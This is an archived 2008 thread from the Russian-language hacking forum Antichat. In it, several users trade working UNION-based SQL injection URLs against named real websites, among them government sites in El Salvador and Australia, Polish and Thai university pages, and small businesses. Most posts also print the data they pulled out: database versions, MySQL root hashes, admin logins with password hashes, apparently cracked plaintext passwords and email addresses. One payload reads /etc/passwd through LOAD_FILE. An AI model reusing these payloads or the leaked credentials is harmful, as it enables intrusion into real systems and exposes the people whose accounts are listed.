ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
07.01.2008, 01:59
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
www.eurowizja.org
http://www.eurowizja.org/
http://www.eurowizja.org/news.php?id=-1149+union+select+1,table_name,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16+from+information_schema.tables+lim it+1,48/*
|
|
|
07.01.2008, 02:00
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Хорошо...сначала наберу матириала, а потом выложу=))
|
|
|
|
07.01.2008, 02:17
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
http://www.ezgulik.org/news.php?id=-197+union+select+1,2,3,4,5,6/*&status=2
http://www.grfoundation.org/news.php?id=-110+union+select+1,2,3,4,5,6,7,8,9,10/*
http://www.seacoastrugby.org/
http://www.seacoastrugby.org/news.php?id=-141+union+select+1,2,concat(username,char(58),pass word,char(58),email),4+from+mos_users/*
admin:f749b2d0d046218a980aa301950d6aa7:rugbyboy
Админку не нашел
|
|
|
|
07.01.2008, 02:48
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684
Репутация:
3908
|
|
Че-то за мной все стали оранджевым писать, плагиат однако, надо было копирайты ставить)))
http://www.proactiva.com.sv/
Код:
http://www.proactiva.com.sv/lanzamiento_det.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9/*
http://www.delcamino.org.sv/
Код:
http://www.delcamino.org.sv/newsDetail.php?id=-1+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14/*
http://www.nombredejesus.gob.sv/
Код:
http://www.nombredejesus.gob.sv/pages/noticias.php?id=-1+union+select+1,2,aes_decrypt(aes_encrypt(concat_ws(0x3a,user,password),0x78),0x78),4,5,6,7+from+mysql.user/*
root:0ba072e62d7711e2
http://www.mag.gob.sv/ Министерство Агрокультуры Сальвадора))))
Код:
http://www.mag.gob.sv/main/index.php?id=-1'+union+select+1,2,3,concat_ws(0x3a,user,password),5,6,7,8,9,10+from+mysql.user/*&mostrar=full&secc=98&nivel=&tabs=4&pivote=1&ids=97
root:2fa7f6d5676bffd5
Таблица админа:
Код:
http://www.mag.gob.sv/main/index.php?id=-1'+union+select+1,2,3,concat_ws(0x3a,usuario,password),5,6,7,8,9,10+from+agroelsalvador.admin_emark+limit+0,1/*&mostrar=full&secc=98&nivel=&tabs=4&pivote=1&ids=97
Колонка password также содержится в
banner : phpads_affiliates
encuestas:users
moodle:mdl_course
moodle:mdl_course_request
moodle:mdl_hotpot
moodle:mdl_lesson
moodle:mdl_lesson_default
moodle:mdl_quiz
moodle:mdl_user
moodle:mdl_workshop
openreports:REPORT_DATASOURCE
openreports:REPORT_USER
Мускул 5, кому надо, тот расковыряет... |
|
|
|
07.01.2008, 06:24
|
|
Новичок
Регистрация: 05.01.2008
Сообщений: 23
Провел на форуме:
301392
Репутация:
2
|
|
http://www.ultraproducts.com/
http://www.ultraproducts.com/st_content.php?id=-1+union+select+1,2,concat(user_name,0x3b,password) +from+users+limit+0,1/*
|
|
|
|
07.01.2008, 06:58
|
|
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
Провел на форуме:
1537850
Репутация:
536
|
|
2Ded MustD!e: ыыы, сделаю красным пожалуй  )).
Опять .AU, надеюсь никого еще этим не задолбал .
http://my.highway1.com.au/
http://my.highway1.com.au/news.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,convert(concat_ws(0 x3A,username,password)+using+latin1),10,11,12,13,1 4,15+from+users/*
О чем сайт я не понял. По URL'у /admin/ по идее распологаеться админка, к которой доступ 403 Forbidden. Также рекомендую посмотреть крайне информативный robots.txt, что этим хотели сказать я также не понял  . Для тех, кто интересуеться, есть file_priv:
http://my.highway1.com.au/news.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,convert(LOAD_FILE(c har(47,101,116,99,47,112,97,115,115,119,100))+usin g+latin1),10,11,12,13,14,15+from+users/*
Вот только magic_quotes=on, так что идея получить шелл через скуль обрубаеться на корню.
http://www.ellaways.com.au/
http://www.ellaways.com.au/news.php?id=-1+UNION+SELECT+1,2,USER(),4,5,6,7,8,9/*
Вообщем сайт тоже очень непонятный по контенту  . Зато есть админка и даже с правом доступа в директории /admin/ Вот только аккаунта админа я не знаю, т.к. таблицы я не подобрал . |
|
|
|
07.01.2008, 14:50
|
|
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
Провел на форуме:
1273248
Репутация:
785
|
|
nahostfocus.de
Код HTML:
http://www.nahostfocus.de/page.php?id=-1534+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),17/*
USER:ftp23972@waldorf.webpack.hosteurope.de
VERSION:5.0.32-Debian_7etch1~bpo.1-log
DATABASE:nahostfocus_de 13
Код HTML:
http://www.nahostfocus.de/page.php?id=-1534+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(table_name),17+from+information_schema.tables/*
Код HTML:
http://www.nahostfocus.de/page.php?id=-1534+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(column_name),17+from+information_schema.columns/*
|
|
|
|
07.01.2008, 16:06
|
|
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
Провел на форуме:
1537850
Репутация:
536
|
|
.AU
http://www.unicentral.net.au/
http://www.unicentral.net.au/news.php?id=-1+UNION+SELECT+1,2,convert(concat_ws(0x3A,admin_na me,admin_password)+using+latin1),4,5,6+FROM+admin+ LIMIT+0,1/*
Подобрал таблицу и поля, аккаунт в /admin/ не подходит =\
http://www.spcc.nsw.edu.au/
http://www.spcc.nsw.edu.au/news.php?action=show&news_id=-1+UNION+SELECT+VERSION(),2,3,4,5,6/*
Таблицы подобрать неполучилось |
|
|
|
07.01.2008, 17:40
|
|
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641
Репутация:
205
|
|
2 trumps
Concat - конкатенция строк. Не нужно писать concat(column_name) FROM что-то, пиши просто column_name FROM что-то
2 all
http://gaffa.dk/
Код HTML:
http://gaffa.dk/nyheder/view.php/news_id=-17392+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(concat(version(),0x3a,user(),0x3a,database()),0x71),0x71),4,5,6,7,8,9,10,11,12,13,14,15,16/*
4.1.11-Debian_4sarge8-log:gaffa@localhost:gaffa
http://www.gearjunkies.com/
Код HTML:
http://www.gearjunkies.com/news_info.php?news_id=731+UNION+SELECT+1,concat_ws(0x3a,version(),user(),database())/*
4.0.24-log:gj_web_user@localhost:gearjunkies
http://www.moteurnature.com/
Код HTML:
http://www.moteurnature.com/actu/uneactu.php?news_id=-464+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7/*
4.0.25-standard-log:moteurnaactua@10.0.64.29:moteurnaactua
http://youarenotalone.bg/
Код HTML:
http://youarenotalone.bg/main/singleNews.php?news_id=-347'+UNION+SELECT+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13/*
5.0.30-Debian_3-log:notalone@localhost:notalone
Код HTML:
http://youarenotalone.bg/main/singleNews.php?news_id=-347'+UNION+SELECT+1,concat_ws(0x3a,id,username,password,email),3,4,5,6,7,8,9,10,11,12,13+FROM+admin+LIMIT+5,1/*
1:standart:7b204c168a0c76ef3a93c4ee78dc3b7a:::standart
8:notalone:b37876218b4aff603cccd55d41fd7338:::alonenot
...
http://www.krepsinis.net/
Код HTML:
http://www.krepsinis.net/news.php?news_id=-75176+UNION+SELECT+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
5.0.22-log:sportotiltas1@192.168.69.21:krepsinis
Код HTML:
http://www.krepsinis.net/news.php?news_id=-75176+UNION+SELECT+1,concat_ws(0x3a,USER_NAME,PASSWORD,EMAIL),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+FROM+users+LIMIT+0,1/*
Setonas:66666:Saulius_p@one.lt (логин справа =)
...
http://www.alteragate.net/
Код HTML:
http://www.alteragate.net/index.php?news_id=-2310+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,version(),user(),database()),0x71),0x71),4/*
4.1.15-log:forum_admin@localhost:forum_db
Код HTML:
http://www.alteragate.net/index.php?news_id=-2310+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,username,user_password,user_email),0x71),0x71),4+FROM+phpbb_users+WHERE+user_id=5/*
( http://forum.alteragate.net/)
Silver Elf:315eb115d98fcbad39ffc5edebd669c9:silver.elf@al teragate.net::qweasdzxc
Lord Sirax:b0a2507b88288f07c66cc3398f380052:lord.sirax@ alteragate.net::salamander
Angela_angel:6c30734811916b0f0f24a4630b08036f:ange la_angel@abv.bg::1234321
...
Последний раз редактировалось ~EviL~; 07.01.2008 в 18:03..
|
|
|
|
07.01.2008, 19:51
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
http://r2.com.au/news.php?page=6&id=-37+union+select+1,2,3,4,5/*
-----------------------------------------------------------------------
http://www.recipeforhappiness.com.au/news.php?p=shw&id=-101+union+select+1,2,3,4,5,6,7,8+from+admin/*
Колонки подобрать не получилось
-----------------------------------------------------------------------
http://www.ecoaction.com.au/news.php?id=-40+union+select+1,2,3,concat(username,char(58),pas sword),5,6+from+users/*
admin:m3mph15
-----------------------------------------------------------------------
http://nsw.cchr.org.au/news.php?id=-62+union+select+table_name,2,3,4,5+from+informatio n_schema.tables/*
-----------------------------------------------------------------------
http://www.swiss.org.au/news.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19/*
-----------------------------------------------------------------------
http://www.4id.com.au/news.php?action=show&news_id=-1+union+select+1,concat(username,char(58),password ),3+from+users/*
-----------------------------------------------------------------------
http://www.screenact.act.gov.au/news.php?action=index&id=-6+union+select+1/*
-----------------------------------------------------------------------
http://www.applehomeloan.com.au/news.php?id=-73+union+select+1,2,3,4/*
-----------------------------------------------------------------------
http://www.puo.pl/news.php?id=-40+union+select+1,2,3,4,5,6/*&backlink=/
-----------------------------------------------------------------------
http://www.proszowki-basen.pl/news.php?id=-186+union+select+1,2,3,table_name,5,6,7,8,9,10,11, 12+from+information_schema.tables+limit+1,100/*
-----------------------------------------------------------------------
http://www.zieloni.org.pl/news.php?id=-3670+union+select+1,2,3,table_name,5,6,7,8,9,10,11 +from+information_schema.tables+limit+1,100/*&PHPSESSID=d541b457ccf042d5d0efd1c85a3234de
-----------------------------------------------------------------------
http://www.ukraine-emb.pl/pl/news.php?id=-271+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
-----------------------------------------------------------------------
http://www.azs.agh.edu.pl/news.php?id=-258+union+select+1,2,3,4,5,concat(name,char(58),pa ssword),7+from+users/*
Админка: http://www.azs.agh.edu.pl/logon.php
dosin:zadzior
codzio:warkastrong
sekretariat:rena21ta
kip9:nuvedewiu8eevr
Rino:rinoonir
-----------------------------------------------------------------------
http://www.turystyka.org.pl/news.php?id=-60'+union+select+1,2,3,4,5,6,7,8,9/*
-----------------------------------------------------------------------
http://www.am-strategies.com/en/news.php?ID=-149+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws (char(58),login,password,email),13,14,15,16,17,18, 19,20,21,22,23,24,25,26,27,28,29,30+from+users/*
admin:test:support@e-commatrix.com
http://am-strategies.com/admin пароль не подходит
-----------------------------------------------------------------------
http://www.bfexplode.de/en/news.php?id=-11+union+select+1,2,password,4+from+users/*
Колонки не нашел((
-----------------------------------------------------------------------
http://audit.kharkov.com/en/news.php?id=-126+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20+from+information_schema.tables/*
Есть таблица phpbb_users
-----------------------------------------------------------------------
http://www.focifum.com/en/news.php?list=0&ID=-7+union+select+1,2,3,4,5,6/*
-----------------------------------------------------------------------
http://www.ekobus.cz/en/news.php?id=-1169768767+union+select+1,2,concat(user,char(58),p ass),4+from+admin/*&lan=en
bus:buPJAuU2.yYGM DES(UNIX)
Админка: http://www.ekobus.cz/admin/
-----------------------------------------------------------------------
http://www.qanat.info/news.php?id=-98+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22/*&mode=en
-----------------------------------------------------------------------
http://fph.tu.ac.th/en/news.php?id=-15+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*&cate=1
-----------------------------------------------------------------------
http://www.audica.co.uk/en/news.php?id=-13+union+select+1,2,3,4,5+from+users/*
-----------------------------------------------------------------------
http://www.le-temps-suspendu.com/revesdesagas/en/news.php?id=-37+union+select+1,2,version(),4/*
-----------------------------------------------------------------------
http://www.xeltek.com.cn/en/news.php?id=-30+union+select+1,2,3,4,5,6/*
P.S Сильно не ругайте))
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
